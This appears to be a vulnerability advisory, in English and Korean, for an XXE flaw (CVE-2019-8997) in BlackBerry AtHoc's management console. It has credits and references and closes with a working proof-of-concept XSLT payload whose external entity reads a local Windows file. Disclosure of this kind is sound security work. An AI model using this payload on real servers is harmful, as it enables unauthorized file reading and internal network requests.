
An XML External Entity Injection (XXE) vulnerability in the Management System (console) of BlackBerry AtHoc versions earlier than 7.6 HF-567 could allow an attacker to potentially read arbitrary local files from the application server or make requests on the network by entering maliciously crafted XML in an existing field.
BlackBerry AtHoc의 Management System(콘솔)에서 버전 7.6 HF-567 이전에 존재하는 XML 외부 엔터티 주입(XXE) 취약점으로 인해, 공격자가 기존 필드에 악의적으로 조작된 XML을 입력하여 애플리케이션 서버의 임의 로컬 파일을 읽거나 네트워크 요청을 보낼 수 있습니다.
Nolan B. Kennedy (nxkennedy)
http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
https://nvd.nist.gov/vuln/detail/CVE-2019-8997
https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/
<!DOCTYPE doc [
<!ELEMENT doc ANY >
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">
<doc>&foo;</doc>
<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>